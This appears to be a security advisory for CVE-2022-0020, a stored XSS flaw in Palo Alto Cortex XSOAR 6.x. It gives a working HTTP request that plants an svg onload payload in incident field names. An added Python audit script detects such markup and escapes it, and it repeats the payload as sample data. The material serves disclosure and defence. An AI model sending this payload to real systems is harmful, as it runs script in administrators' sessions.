## https://sploitus.com/exploit?id=PACKETSTORM:171782
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)  
# Exploit Author: omurugur  
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020  
# Version: 6.5.0 - 6.2.0 - 6.1.0  
# Tested on: [relevant os]  
# CVE : CVE-2022-0020  
# Author Web: https://www.justsecnow.com  
# Author Social: @omurugurrr  
  
  
A stored cross-site scripting (XSS) vulnerability in the Palo Alto Networks  
Cortex XSOAR web interface enables an authenticated network-based attacker  
to store a persistent JavaScript payload that will perform arbitrary  
actions in the Cortex XSOAR web interface on behalf of authenticated  
administrators who encounter the payload during normal operations.  
  
POST /acc_UAB(MAY)/incidentfield HTTP/1.1  
Host: x.x.x.x  
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x; isTimLicense=false  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: application/json  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://x.x.x.x/acc_UAB(MAY)  
Content-Type: application/json  
X-Xsrf-Token:  
Api_truncate_results: true  
Origin: https://x.x.x.x  
Content-Length: 373  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
Connection: close  
  
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}  
  
Regards,  
  
Omur UGUR
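
Added example (not part of the original advisory and not Palo Alto Networks code): a defender-side audit that scans incident field definitions, given in the JSON shape of the request body above, for markup in the "name" and "description" values and returns the HTML-escaped form that renders inert. The function names, the pattern list and the sample data are assumptions constructed for illustration.

```python
import html
import json
import re

# Patterns that have no place in a field label or description (assumed list).
SUSPICIOUS = {
    "html tag": re.compile(r"<\s*/?\s*[a-zA-Z!]"),
    "event-handler attribute": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript: URL": re.compile(r"javascript\s*:", re.I),
}
# Keys taken from the request body shown in the advisory.
TEXT_KEYS = ("name", "description")


def audit_field(field):
    """Return (key, reason, escaped_value) findings for one field definition."""
    findings = []
    for key in TEXT_KEYS:
        value = field.get(key)
        if not isinstance(value, str):
            continue  # ignore missing or non-text values
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(value):
                findings.append((key, reason, html.escape(value, quote=True)))
    return findings


def audit_fields(raw_json):
    """Audit a JSON array of field definitions; map list index -> findings."""
    report = {}
    for i, field in enumerate(json.loads(raw_json)):
        hits = audit_field(field) if isinstance(field, dict) else []
        if hits:
            report[i] = hits
    return report


# Constructed sample: one benign field, one shaped like the advisory's body.
SAMPLE = json.dumps([
    {"name": "Asset owner", "type": "shortText", "description": "Owner of the host"},
    {"name": "\"/><svg/onload=prompt(document.domain)>", "type": "html",
     "description": "\"/><svg/onload=prompt(document.domain)>"},
])

if __name__ == "__main__":
    for idx, hits in audit_fields(SAMPLE).items():
        for key, reason, escaped in hits:
            print(f"field[{idx}].{key}: {reason}: {escaped}")
```

The escaped value in each finding is what the interface would need to emit for the stored string to display as text instead of being parsed as markup.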